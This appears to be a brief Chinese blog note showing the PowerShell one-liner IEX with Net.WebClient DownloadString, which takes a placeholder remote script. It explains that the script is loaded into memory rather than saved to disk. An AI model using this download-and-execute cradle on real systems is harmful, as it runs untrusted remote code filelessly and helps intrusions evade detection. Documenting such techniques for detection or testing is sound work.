powershell IEX

IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); 

 该命令将#{remote_script}加载到内存,并没有把该脚本下载到本地。

发布了221 篇原创文章 · 获赞 26 · 访问量 11万+

猜你喜欢

转载自blog.csdn.net/qq_28808697/article/details/103036894